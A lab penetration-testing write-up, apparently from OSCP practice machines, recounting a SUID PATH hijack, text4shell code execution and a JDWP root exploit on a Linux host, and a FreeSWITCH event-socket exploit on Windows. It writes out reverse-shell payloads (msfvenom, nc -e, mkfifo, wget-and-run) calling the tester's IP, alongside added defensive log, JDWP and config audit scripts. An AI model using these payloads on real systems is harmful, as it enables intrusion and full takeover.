-rw-r--r-- 1 john john   3771 Feb 25  2020 .bashrc
drwx------ 2 john john   4096 Nov  2  2022 .cache/
drwx------ 3 john john   4096 Jan  5 09:03 .gnupg/
-rw------- 1 john john     33 Nov 17  2022 .lesshst
-rw-r--r-- 1 john john    807 Feb 25  2020 .profile
drwx------ 2 john john   4096 Nov 21  2022 .ssh/
-rw------- 1 john john    816 Nov 22  2022 .viminfo
-rw-rw-r-- 1 john john    257 Nov 22  2022 .wget-hsts
-rwsrwsr-x 1 root root  16792 Nov 21  2022 RESET_PASSWD*
-rwxr-xr-x 1 john john 862779 Jan  5 09:00 linpeas.sh*
-rw-r--r-- 1 john john     33 Jan  5 08:44 local.txt
drwx------ 3 john john   4096 Jan  5 09:03 snap/

I analyse it with strings:

Bash
john@oscp:~$ strings RESET_PASSWD

[...]
echo kiero:kiero | chpasswd
echo Resetting password of 'kiero' to the default value
[...]

The script runs a series of commands to reset kiero's password. It calls chpasswd without an absolute path, so in theory it could look for it in the executable's own directory. I create a reverse shell named chpasswd with msfvenom and upload it to john's home:

Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/OSCP_B]
└─$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.45.248 LPORT=5566 -f elf -o chpasswd   
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 74 bytes
Final size of elf file: 194 bytes
Saved as: chpasswd

I open a listener on port 5566 and run the script after making chpasswd executable:

Bash
john@oscp:~$ ./RESET_PASSWD 
Resetting password of kiero to the default value

The poisoned chpasswd is not picked up (the current directory is not on PATH), so I put john's home on PATH:

Bash
john@oscp:~$ export PATH=/home/john
john@oscp:~$ ./RESET_PASSWD 
Resetting password of kiero to the default value

At this point a root shell comes back to the listener on port 5566:

Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/OSCP_B]
└─$ nc -nvlp 5566
listening on [any] 5566 ...
connect to [192.168.45.248] from (UNKNOWN) [192.168.199.149] 41266
python3 -c 'import pty; pty.spawn("/bin/bash")'
root@oscp:/home/john# 

Finally I grab the flags:

008.png


Berlin

  • Target IP: 192.168.149.150

Enumeration

Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/OSCP_B]
└─$ sudo nmap -Pn -p- -oN alltcp_ports_berlin.txt 192.168.149.150        
[sudo] password for momphucker: 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-05 10:45 CET
Nmap scan report for 192.168.149.150
Host is up (0.087s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
8080/tcp open  http-proxy

┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/OSCP_B]
└─$ sudo nmap -Pn -sC -sV -p22,8080 -oN alltcp_berlin.txt 192.168.149.150 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-05 10:46 CET
Nmap scan report for 192.168.149.150
Host is up (0.074s latency).

PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 ad:ac:80:0a:5f:87:44:ea:ba:7f:95:ca:1e:90:78:0d (ECDSA)
|_  256 b3:ae:d1:25:24:c2:ab:4f:f9:40:c5:f0:0b:12:87:bb (ED25519)
8080/tcp open  http-proxy
|_http-open-proxy: Proxy might be redirecting requests
|_http-favicon: Spring Java Framework
|_http-title: Site doesn't have a title (text/plain;charset=UTF-8).
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 404 
|     Content-Type: application/json;charset=UTF-8
|     Date: Sun, 05 Jan 2025 09:46:38 GMT
|     Connection: close
|     {"timestamp":"2025-01-05T09:46:38.665+0000","status":404,"error":"Not Found","message":"No message available","path":"/nice%20ports%2C/Tri%6Eity.txt%2ebak"}
|   GetRequest: 
|     HTTP/1.1 200 
|     Content-Type: text/plain;charset=UTF-8
|     Content-Length: 19
|     Date: Sun, 05 Jan 2025 09:46:38 GMT
|     Connection: close
|     {"api-status":"up"}
|   HTTPOptions: 
|     HTTP/1.1 200 
|     Allow: GET,HEAD,OPTIONS
|     Content-Length: 0
|     Date: Sun, 05 Jan 2025 09:46:38 GMT
|     Connection: close
|   RTSPRequest: 
|     HTTP/1.1 505 
|     Content-Type: text/html;charset=utf-8
|     Content-Language: en
|     Content-Length: 830
|     Date: Sun, 05 Jan 2025 09:46:38 GMT
|     <!doctype html><html lang="en"><head><title>HTTP Status 505 
|     HTTP Version Not Supported</title><style type="text/css">h1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} h2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} h3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} body {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} b {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} p {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;} a {color:black;} a.name {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1
|   Socks5: 
|     HTTP/1.1 400 
|     Content-Type: text/html;charset=utf-8
|     Content-Language: en
|     Content-Length: 800
|     Date: Sun, 05 Jan 2025 09:46:38 GMT
|     Connection: close
|     <!doctype html><html lang="en"><head><title>HTTP Status 400 
|_    Request</title><style type="text/css">h1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} h2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} h3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} body {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} b {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} p {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;} a {color:black;} a.name {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8080-TCP:V=7.94SVN%I=7%D=1/5%Time=677A54FE%P=aarch64-unknown-linux-
SF:gnu%r(GetRequest,98,"HTTP/1\.1\x20200\x20\r\nContent-Type:\x20text/plai
SF:n;charset=UTF-8\r\nContent-Length:\x2019\r\nDate:\x20Sun,\x2005\x20Jan\
SF:x202025\x2009:46:38\x20GMT\r\nConnection:\x20close\r\n\r\n{\"api-status
SF:\":\"up\"}")%r(HTTPOptions,75,"HTTP/1\.1\x20200\x20\r\nAllow:\x20GET,HE
SF:AD,OPTIONS\r\nContent-Length:\x200\r\nDate:\x20Sun,\x2005\x20Jan\x20202
SF:5\x2009:46:38\x20GMT\r\nConnection:\x20close\r\n\r\n")%r(RTSPRequest,3C
SF:6,"HTTP/1\.1\x20505\x20\r\nContent-Type:\x20text/html;charset=utf-8\r\n
SF:Content-Language:\x20en\r\nContent-Length:\x20830\r\nDate:\x20Sun,\x200
SF:5\x20Jan\x202025\x2009:46:38\x20GMT\r\n\r\n<!doctype\x20html><html\x20l
SF:ang=\"en\"><head><title>HTTP\x20Status\x20505\x20\xe2\x80\x93\x20HTTP\x
SF:20Version\x20Not\x20Supported</title><style\x20type=\"text/css\">h1\x20
SF:{font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D
SF:76;font-size:22px;}\x20h2\x20{font-family:Tahoma,Arial,sans-serif;color
SF::white;background-color:#525D76;font-size:16px;}\x20h3\x20{font-family:
SF:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:
SF:14px;}\x20body\x20{font-family:Tahoma,Arial,sans-serif;color:black;back
SF:ground-color:white;}\x20b\x20{font-family:Tahoma,Arial,sans-serif;color
SF::white;background-color:#525D76;}\x20p\x20{font-family:Tahoma,Arial,san
SF:s-serif;background:white;color:black;font-size:12px;}\x20a\x20{color:bl
SF:ack;}\x20a\.name\x20{color:black;}\x20\.line\x20{height:1px;background-
SF:color:#525D76;border:none;}</style></head><body><h1")%r(FourOhFourReque
SF:st,113,"HTTP/1\.1\x20404\x20\r\nContent-Type:\x20application/json;chars
SF:et=UTF-8\r\nDate:\x20Sun,\x2005\x20Jan\x202025\x2009:46:38\x20GMT\r\nCo
SF:nnection:\x20close\r\n\r\n{\"timestamp\":\"2025-01-05T09:46:38\.665\+00
SF:00\",\"status\":404,\"error\":\"Not\x20Found\",\"message\":\"No\x20mess
SF:age\x20available\",\"path\":\"/nice%20ports%2C/Tri%6Eity\.txt%2ebak\"}"
SF:)%r(Socks5,3BB,"HTTP/1\.1\x20400\x20\r\nContent-Type:\x20text/html;char
SF:set=utf-8\r\nContent-Language:\x20en\r\nContent-Length:\x20800\r\nDate:
SF:\x20Sun,\x2005\x20Jan\x202025\x2009:46:38\x20GMT\r\nConnection:\x20clos
SF:e\r\n\r\n<!doctype\x20html><html\x20lang=\"en\"><head><title>HTTP\x20St
SF:atus\x20400\x20\xe2\x80\x93\x20Bad\x20Request</title><style\x20type=\"t
SF:ext/css\">h1\x20{font-family:Tahoma,Arial,sans-serif;color:white;backgr
SF:ound-color:#525D76;font-size:22px;}\x20h2\x20{font-family:Tahoma,Arial,
SF:sans-serif;color:white;background-color:#525D76;font-size:16px;}\x20h3\
SF:x20{font-family:Tahoma,Arial,sans-serif;color:white;background-color:#5
SF:25D76;font-size:14px;}\x20body\x20{font-family:Tahoma,Arial,sans-serif;
SF:color:black;background-color:white;}\x20b\x20{font-family:Tahoma,Arial,
SF:sans-serif;color:white;background-color:#525D76;}\x20p\x20{font-family:
SF:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}\x
SF:20a\x20{color:black;}\x20a\.name\x20{color:black;}\x20\.line\x20{height
SF::1px;background-color:#525D76;border:none;}</style></head><body");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Port 8080

009.png

010.png

011.png

012.png

Exploit

The service on port 8080 is Spring Boot and, as stated at http://192.168.149.150:8080/CHANGELOG, it uses Apache Commons Text 1.8. This appears to be affected by the vulnerability known as text4shell. Some information about it at this link.
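The `${script:...}` lookup used below is what text4shell (CVE-2022-42889, Apache Commons Text 1.5 through 1.9) turns into code execution, so a defender wants to spot it in request logs. The following Python script is an added example and not part of the original writeup: it URL-decodes each access-log line (repeatedly, since encoding is often nested to evade naive filters) and flags the `script`, `dns` and `url` lookup prefixes that the vulnerable default interpolator resolves. The log lines are constructed for this example, not real traffic.

```python
import re
from urllib.parse import unquote

# Lookups that the default Commons Text 1.5-1.9 interpolator resolves and that
# give an attacker code execution (script) or network reach (dns, url).
LOOKUP_RE = re.compile(r"\$\{\s*(script|dns|url)\s*:", re.IGNORECASE)


def decode_layers(s: str, rounds: int = 3) -> str:
    """URL-decode repeatedly: nested encoding is a common filter-evasion trick."""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def find_lookups(line: str) -> list:
    """Return the dangerous lookup prefixes present in one log line."""
    return [m.group(1).lower() for m in LOOKUP_RE.finditer(decode_layers(line))]


def scan_access_log(lines):
    """Yield (line_number, lookups, raw_line) for every suspicious request."""
    for number, line in enumerate(lines, 1):
        hits = find_lookups(line)
        if hits:
            yield number, hits, line


# Constructed access-log lines in combined-log format (not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [05/Jan/2025:09:46:38 +0000] "GET /search?query=hello HTTP/1.1" 200 19',
    '192.0.2.10 - - [05/Jan/2025:09:47:02 +0000] "GET /search?query=${script:javascript:java.lang.Runtime.getRuntime().exec(\'id\')} HTTP/1.1" 200 19',
    '192.0.2.10 - - [05/Jan/2025:09:47:15 +0000] "GET /search?query=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27id%27%29%7D HTTP/1.1" 200 19',
    '192.0.2.10 - - [05/Jan/2025:09:47:30 +0000] "GET /search?query=${date:yyyy-MM-dd} HTTP/1.1" 200 19',
    '192.0.2.10 - - [05/Jan/2025:09:47:44 +0000] "GET /search?query=%2524%257Bscript%253A%2520javascript%253Ax%257D HTTP/1.1" 200 19',
]

if __name__ == "__main__":
    for number, hits, line in scan_access_log(SAMPLE_LOG):
        print(f"line {number}: {', '.join(hits)} lookup -> {line}")
```

The `${date:...}` line is deliberately left unflagged: that lookup is harmless, and a rule that fires on every `${` would drown the real hits. The actual fix is to move to Commons Text 1.10.0 or later, where these three lookups are no longer in the default interpolator, or to build the `StringSubstitutor` with an explicit allow-list of lookups; the log check is what catches attempts against a system that has not been patched yet.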

I run sudo tcpdump -i tun0 icmp in the terminal to check whether the pings arrive.

I try submitting the call ${script:javascript:java.lang.Runtime.getRuntime().exec('ping -c 5 192.168.45.248')} in the search query:

013.png

The pings arrive, so the script really does execute commands:

Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/…/offsec_/machines/OSCP_B/Berlin]
└─$ sudo tcpdump -i tun0 icmp
[sudo] password for momphucker: 
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
14:19:08.710713 IP 192.168.149.150 > 192.168.45.248: ICMP echo request, id 6, seq 1, length 64
14:19:08.710730 IP 192.168.45.248 > 192.168.149.150: ICMP echo reply, id 6, seq 1, length 64

I try inserting commands of this kind, but with no result:

Text Only
${script:javascript:java.lang.Runtime.getRuntime().exec('nc 192.168.45.248 4444 -e /bin/bash')}
${script:javascript:java.lang.Runtime.getRuntime().exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.45.248 4444 >/tmp/f')}
[...]

So what I try to do is:

  1. Create a reverse shell with msfvenom:

    Bash
    msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.45.248 LPORT=4444 -f elf -o rev.elf
    

  2. Make the reverse shell available through a web server, so that the script can fetch it onto the target machine:

    Bash
    ${script:javascript:java.lang.Runtime.getRuntime().exec('wget -O /tmp/rev.elf 192.168.45.248/rev.elf')}
    

  3. Grant execute permissions:

    Bash
    ${script:javascript:java.lang.Runtime.getRuntime().exec('chmod +x /tmp/rev.elf')} 
    

  4. Finally run it, with the listener on port 4444 already open:

    Bash
    ${script:javascript:java.lang.Runtime.getRuntime().exec('/tmp/rev.elf')}
    

The shell opens as dev:

Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/…/offsec_/machines/OSCP_B/Berlin]
└─$ nc -lvnp 4444   
listening on [any] 4444 ...
connect to [192.168.45.248] from (UNKNOWN) [192.168.149.150] 33004

whoami
dev
python3 -c 'import pty; pty.spawn("/bin/bash")'
dev@oscp:/$

Finally I capture the local.txt flag:

014.png

Privilege Escalation

I upload linpeas to the machine and run it. It highlights a possible weakness in JDWP, a Java debugging service. I find the jdwp-shellifier exploit, which works against port 8000 of that service. The exploit has to be run with python2, which is not present on the target machine, so I have to run it from the Kali machine; port 8000, however, is not reachable from outside. I therefore upload a socat executable to the machine so I can launch it without sudo: since port 8000 is not open to the outside, I open port 8002 and redirect its traffic to 8000.
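The condition the writeup runs into here, a JDWP agent bound only to loopback but reachable through a forwarder by any low-privileged local account, with the JVM running as root, is exactly what an auditor should be looking for on a host. The following Python script is an added example and not part of the original writeup: it parses `-agentlib:jdwp=...` (and the older `-Xrunjdwp:...`) options out of `ps -eo user,args`-style output and rates each server-mode agent by its bind address and the owning user. The process listing is constructed for this example; the risk labels are my own.

```python
import re

# Matches both the modern -agentlib:jdwp=... and the legacy -Xrunjdwp:... forms.
JDWP_RE = re.compile(r"-(?:agentlib:jdwp=|Xrunjdwp:)(\S+)")

ALL_INTERFACES = {"*", "0.0.0.0", "::"}


def parse_jdwp_options(cmdline):
    """Return the jdwp key=value options from a java command line, or None."""
    m = JDWP_RE.search(cmdline)
    if not m:
        return None
    opts = {}
    for item in m.group(1).split(","):
        key, _, value = item.partition("=")
        opts[key] = value
    return opts


def assess(user, opts):
    """Rate a server-mode JDWP agent by who can reach it and who it runs as."""
    if opts.get("server") != "y":
        return None                      # client mode: no listening socket
    host, _, port = opts.get("address", "").rpartition(":")
    if host in ALL_INTERFACES:
        bind, risk = "all interfaces", "critical"
    else:
        # No host means loopback on JDK 9+ (all interfaces on JDK 8 and older).
        bind = host or "loopback (JDK 9+ default)"
        # Loopback only stops remote clients; any local account can forward a
        # port to it, and the debugger runs code with the JVM's privileges.
        risk = "critical" if user == "root" else "high"
    return {"user": user, "port": port, "bind": bind, "risk": risk}


def audit(ps_output):
    """Scan `ps -eo user,args`-style output and report JDWP listeners."""
    findings = []
    for line in ps_output.splitlines()[1:]:        # skip the header row
        user, _, args = line.strip().partition(" ")
        opts = parse_jdwp_options(args)
        if opts:
            result = assess(user, opts)
            if result:
                findings.append(result)
    return findings


# Constructed process listing (not taken from a real host).
PS_SAMPLE = """\
USER       COMMAND
root       /usr/bin/java -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=8000 -cp /opt/stats StatsApp
dev        /usr/bin/java -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=*:5005 -jar /opt/app/app.jar
app        /usr/bin/java -Xrunjdwp:transport=dt_socket,server=y,address=127.0.0.1:5006 -jar /opt/svc/svc.jar
www-data   /usr/bin/java -jar /opt/web/web.jar
"""

if __name__ == "__main__":
    for f in audit(PS_SAMPLE):
        print(f"{f['risk']:8} user={f['user']:8} port={f['port']:5} bind={f['bind']}")
```

A debug agent belongs in a development JVM, not a production one: if it really is needed, bind it to loopback, reach it through an authenticated tunnel such as SSH port forwarding, and never run the debugged JVM as root, because a JDWP client can invoke any method, including `Runtime.exec`, with that process's identity.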

Bash
dev@oscp:/chmod +x socat
dev@oscp:/home/dev$ ./socat TCP-LISTEN:8002,fork TCP:localhost:8000
./socat TCP-LISTEN:8002,fork TCP:localhost:8000

Mindful that netcat does not seem to work properly here, I create a reverse shell with msfvenom and then upload it to the target machine:

Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/…/offsec_/machines/OSCP_B/Berlin]
└─$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.45.248 LPORT=1234 -f elf -o reverse.elf

At this point I launch the exploit:

Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/…/offsec_/machines/OSCP_B/Berlin]
└─$ python2 ./46501.py -t 192.168.149.150 -p 8002 --cmd "/home/dev/reverse.elf"
[+] Targeting '192.168.149.150:8002'
[+] Reading settings for 'OpenJDK 64-Bit Server VM - 11.0.16'
[+] Found Runtime class: id=8b1
[+] Found Runtime.getRuntime(): id=7f82e002e0a8
[+] Created break event id=2
[+] Waiting for an event on 'java.net.ServerSocket.accept'

The exploit stays waiting for a call to java.net.ServerSocket.accept.

After a closer look, it turns out the call is awaited on port 5000:

Java
dev@oscp:/opt/stats$ cat App.java
cat App.java
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.ServerSocket;
import java.net.Socket;

class StatsApp {
    public static void main(String[] args) {
        System.out.println("System Stats\n");
        Runtime rt = Runtime.getRuntime();
        String output = new String();

        try {
            ServerSocket echod = new ServerSocket(5000);
            while (true) {
              output = "";
              output += "Available Processors: " + rt.availableProcessors() +"\r\n";
              output += "Free Memory: " + rt.freeMemory() + "\r\n";
              output += "Total Memory: " + rt.totalMemory() +"\r\n";

              Socket socket = echod.accept();
              InputStream in = socket.getInputStream();
              OutputStream out = socket.getOutputStream();
              out.write((output + "\r\n").getBytes());
              System.out.println(output);
            }
        } catch (IOException e) {
            System.err.println(e.toString());
            System.exit(1);
        }
    }
}

Since socat was launched with fork, I can close the shell, because the process keeps running anyway, and reopen it to make the call to port 5000:

Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/…/offsec_/machines/OSCP_B/Berlin]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.45.248] from (UNKNOWN) [192.168.149.150] 34022
python3 -c 'import pty; pty.spawn("/bin/bash")'
dev@oscp:/$ cd /home/dev
cd /home/dev
dev@oscp:/home/dev$ curl http://127.0.0.1:5000
curl http://127.0.0.1:5000
curl: (1) Received HTTP/0.9 when not allowed
dev@oscp:/home/dev$ 

At this point the exploit completes:

Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/…/offsec_/machines/OSCP_B/Berlin]
└─$ python2 ./46501.py -t 192.168.149.150 -p 8002 --cmd "/home/dev/reverse.elf"
[+] Targeting '192.168.149.150:8002'
[+] Reading settings for 'OpenJDK 64-Bit Server VM - 11.0.16'
[+] Found Runtime class: id=8b1
[+] Found Runtime.getRuntime(): id=7f82e002e0a8
[+] Created break event id=2
[+] Waiting for an event on 'java.net.ServerSocket.accept'
[+] Received matching event from thread 0x94d
[+] Selected payload '/home/dev/reverse.elf'
[+] Command string object created id:94e
[+] Runtime.getRuntime() returned context id:0x94f
[+] found Runtime.exec(): id=7f82e002e0e0
[+] Runtime.exec() successful, retId=950
[!] Command successfully executed

The shell opens as root in the listener set up earlier on port 1234:

Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/…/offsec_/machines/OSCP_B/Berlin]
└─$ nc -lvnp 1234 
listening on [any] 1234 ...
connect to [192.168.45.248] from (UNKNOWN) [192.168.149.150] 42980
python3 -c 'import pty; pty.spawn("/bin/bash")'
root@oscp:/# whoami
whoami
root
root@oscp:/#

Finally I retrieve the proof.txt flag:

015.png


Gust

Target IP: 192.168.149.151

Enumeration

Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/…/offsec_/machines/OSCP_B/Gust]
└─$ sudo nmap -Pn -p- -oN alltcp_ports.txt 192.168.149.151      
[sudo] password for momphucker: 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-06 11:41 CET
Nmap scan report for 192.168.149.151
Host is up (0.066s latency).
Not shown: 65524 filtered tcp ports (no-response)
PORT     STATE SERVICE
80/tcp   open  http
2855/tcp open  msrp
2856/tcp open  cesdinv
3389/tcp open  ms-wbt-server
5060/tcp open  sip
5066/tcp open  stanag-5066
5080/tcp open  onscreen
7443/tcp open  oracleas-https
8021/tcp open  ftp-proxy
8081/tcp open  blackice-icecap
8082/tcp open  blackice-alerts

┌──(momphucker㉿kali-vmw-warmachine)-[~/…/offsec_/machines/OSCP_B/Gust]
└─$ sudo nmap -Pn -sC -sV -p80,2855,2856,3389,5060,50566,5080,7443,8021,8081,8082 -oN alltcp.txt 192.168.149.151
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-06 11:44 CET
Nmap scan report for 192.168.149.151
Host is up (0.067s latency).

PORT      STATE    SERVICE          VERSION
80/tcp    open     http             Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows
2855/tcp  open     msrp?
2856/tcp  open     ssl/cesdinv?
| ssl-cert: Subject: commonName=FreeSWITCH/countryName=US
| Not valid before: 2022-10-28T14:47:12
|_Not valid after:  1986-09-04T08:18:56
|_ssl-date: TLS randomness does not represent time
3389/tcp  open     ms-wbt-server    Microsoft Terminal Services
|_ssl-date: 2025-01-06T10:48:15+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=OSCP
| Not valid before: 2024-12-06T18:20:01
|_Not valid after:  2025-06-07T18:20:01
| rdp-ntlm-info: 
|   Target_Name: OSCP
|   NetBIOS_Domain_Name: OSCP
|   NetBIOS_Computer_Name: OSCP
|   DNS_Domain_Name: OSCP
|   DNS_Computer_Name: OSCP
|   Product_Version: 10.0.19041
|_  System_Time: 2025-01-06T10:48:02+00:00
5060/tcp  open     sip-proxy        FreeSWITCH mod_sofia 1.10.1~64bit
|_sip-methods: INVITE, ACK, BYE, CANCEL, OPTIONS, MESSAGE, INFO, UPDATE, REGISTER, REFER, NOTIFY, PUBLISH, SUBSCRIBE
5080/tcp  open     sip-proxy        FreeSWITCH mod_sofia 1.10.1~64bit
7443/tcp  open     ssl/websocket    (WebSocket version: 13)
|_ssl-date: TLS randomness does not represent time
| fingerprint-strings: 
|   GenericLines: 
|     HTTP/1.1 400 Bad Request
|_    Sec-WebSocket-Version: 13
| ssl-cert: Subject: commonName=FreeSWITCH/countryName=US
| Not valid before: 2022-10-28T14:47:12
|_Not valid after:  1986-09-04T08:18:56
8021/tcp  open     freeswitch-event FreeSWITCH mod_event_socket
8081/tcp  open     websocket        (WebSocket version: 13)
| fingerprint-strings: 
|   GenericLines, GetRequest, HTTPOptions: 
|     HTTP/1.1 400 Bad Request
|_    Sec-WebSocket-Version: 13
8082/tcp  open     ssl/websocket    (WebSocket version: 13)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=FreeSWITCH/countryName=US
| Not valid before: 2022-10-28T14:47:12
|_Not valid after:  1986-09-04T08:18:56
| fingerprint-strings: 
|   GenericLines, GetRequest, HTTPOptions: 
|     HTTP/1.1 400 Bad Request
|_    Sec-WebSocket-Version: 13
50566/tcp filtered unknown
3 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port7443-TCP:V=7.94SVN%T=SSL%I=7%D=1/6%Time=677BB420%P=aarch64-unknown-
SF:linux-gnu%r(GenericLines,37,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nSec-
SF:WebSocket-Version:\x2013\r\n\r\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port8081-TCP:V=7.94SVN%I=7%D=1/6%Time=677BB40C%P=aarch64-unknown-linux-
SF:gnu%r(GetRequest,37,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nSec-WebSocke
SF:t-Version:\x2013\r\n\r\n")%r(GenericLines,37,"HTTP/1\.1\x20400\x20Bad\x
SF:20Request\r\nSec-WebSocket-Version:\x2013\r\n\r\n")%r(HTTPOptions,37,"H
SF:TTP/1\.1\x20400\x20Bad\x20Request\r\nSec-WebSocket-Version:\x2013\r\n\r
SF:\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port8082-TCP:V=7.94SVN%T=SSL%I=7%D=1/6%Time=677BB420%P=aarch64-unknown-
SF:linux-gnu%r(GenericLines,37,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nSec-
SF:WebSocket-Version:\x2013\r\n\r\n")%r(GetRequest,37,"HTTP/1\.1\x20400\x2
SF:0Bad\x20Request\r\nSec-WebSocket-Version:\x2013\r\n\r\n")%r(HTTPOptions
SF:,37,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nSec-WebSocket-Version:\x2013
SF:\r\n\r\n");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Port 80

016.png

Exploit

For the FreeSWITCH service there is exploit 47799. I open a listener on port 4444 and run the exploit:

Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/…/offsec_/machines/OSCP_B/Gust]
└─$ python3 47799.py 192.168.149.151 'powershell -e [...]'
Authenticated

Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/…/offsec_/machines/OSCP_B/Gust]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.45.248] from (UNKNOWN) [192.168.149.151] 50202

PS C:\Program Files\FreeSWITCH> whoami
oscp\chris
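The "Authenticated" line above is the whole story of this foothold: the exploit speaks to the mod_event_socket listener on port 8021, and that listener ships with a well-known stock password (ClueCon) and, in many deployments, no client restriction beyond the bind address. The Python script below is an added example and not part of the original writeup or of FreeSWITCH: it reads an event_socket.conf.xml and reports the weak settings, shown on a constructed weak file and a constructed hardened one. The param names (listen-ip, listen-port, password, apply-inbound-acl) follow the layout of the shipped configuration file; treat that layout as an assumption and check it against your own install.

```python
import xml.etree.ElementTree as ET

# Well-known stock password of mod_event_socket; exploits for this service
# simply try it first.
DEFAULT_PASSWORD = "ClueCon"

# Constructed samples following the stock event_socket.conf.xml layout
# (assumption: the param names listen-ip, listen-port, password and
# apply-inbound-acl, which is how the shipped file is structured).
WEAK_CONF = """\
<configuration name="event_socket.conf" description="Socket Client">
  <settings>
    <param name="nat-map" value="false"/>
    <param name="listen-ip" value="::"/>
    <param name="listen-port" value="8021"/>
    <param name="password" value="ClueCon"/>
  </settings>
</configuration>
"""

HARDENED_CONF = """\
<configuration name="event_socket.conf" description="Socket Client">
  <settings>
    <param name="nat-map" value="false"/>
    <param name="listen-ip" value="127.0.0.1"/>
    <param name="listen-port" value="8021"/>
    <param name="password" value="example-long-random-secret-Q7v9pL2xK"/>
    <param name="apply-inbound-acl" value="loopback.auto"/>
  </settings>
</configuration>
"""


def read_params(xml_text):
    """Map every <param name=... value=...> in the file to a dict."""
    root = ET.fromstring(xml_text)
    return {p.get("name"): p.get("value", "") for p in root.iter("param")}


def audit_event_socket(xml_text, min_password_len=16):
    """Return a list of findings; an empty list means no weak setting found."""
    params = read_params(xml_text)
    findings = []
    password = params.get("password", "")
    if password == DEFAULT_PASSWORD:
        findings.append("password is the stock default")
    elif len(password) < min_password_len:
        findings.append(f"password shorter than {min_password_len} characters")
    if params.get("listen-ip", "") in ("", "::", "0.0.0.0"):
        findings.append("listener bound to all interfaces")
    if not params.get("apply-inbound-acl"):
        findings.append("no inbound ACL restricts which clients may connect")
    return findings


if __name__ == "__main__":
    for label, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(label, audit_event_socket(conf) or ["ok"])
```

The event socket is an administrative interface that can run system commands, so the hardened file treats it like one: loopback bind, an ACL, and a password that is not the one every scanner knows. The nmap output above (port 8021 answering as freeswitch-event from the Internet-facing address) is already enough to tell that the first two of those were missing on this host.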

Finally I capture the local.txt flag:

017.png

